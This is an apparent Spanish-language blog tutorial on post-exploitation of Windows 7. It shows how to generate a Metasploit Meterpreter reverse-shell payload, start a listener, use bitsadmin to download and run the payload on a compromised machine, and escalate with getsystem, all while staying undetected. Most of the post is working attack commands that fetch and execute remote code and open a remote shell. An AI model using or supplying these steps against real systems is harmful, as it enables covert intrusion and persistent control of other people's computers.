Post Explotación de Windows 7 con BITSADMIN
Durante la parte de post-explotación de un sistema operativo como Windows 7 , es muy importante poder preservar el control , para ello es necesario descargar y ejecutar nuestros shell reversos, y evidentemente tiene que pasar desapercibido.
Para esto en Windows 7 encontramos BITS “Servicio de transferencia inteligente en segundo plano de Microsoft”. Se utiliza para transferir archivos, entre otras cosas.
Planteemos este escenario:
Contamos con una consola de DOS en Windows 7 , obtenida de alguna forma, (con netcat por ejemplo) sin embargo una consola DOS, muchas veces es muy limitada, ya que necesitamos ejecutar comandos mas complejos, entonces nos ponemos a trabajar para tener nuevamente una sesión de Meterpreter, apoyándonos en BITS , de la siguiente forma:
En Kali Linux creamos un Payload con Metasploit donde la IP 10.10.88.236 es la IP de Kali
#msfpayload windows/meterpreter/reverse_tcp lhost=10.10.88.236 lport=1234 X > /var/www/shell.exe
Ahora abriremos el handler de Metasploit
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=10.10.88.236 lport=1234 E
En la consola de Windows que tenemos, descargaremos el shell.exe de la maquina Kali Linux
C:\Windows\system32> cd Users
C:\Windows\system32> cd ecornejo
C:\Windows\system32> cd Destktop
C:\Windows\system32> bitsadmin /create proceso1
C:\Windows\system32> bitsadmin /addfile proceso1 http://10.10.88.236/shell.exe c:\Users\ecornejo\Desktop\shell.exe
C:\Windows\system32> bitsadmin /resume proceso1
C:\Windows\system32> bitsadmin /complete proceso1
Con esto realizado, tendremos nuestro shell.exe en el escritorio del usuario , ahora lo ejecutaremos
C:\Windows\system32> cd c:\Users\ecornejo\Desktop
C:\Windows\system32> shell.exe
Si todo salio bien tendremos una sesión de Meterpreter activa y lista para volver a tomar el control
meterpreter > getuid
meterpreter > getsystem
Nota: Es evidente que no es la única forma , también esta el hecho de que un antivirus puede detectar nuestro exe, sin embargo para eso también existen otros mecanismos , espero les sirva.
Referencias:
http://technet.microsoft.com/en-us/magazine/ff382721.aspx
http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx
Excelente como siempre profesor Juan Oliva.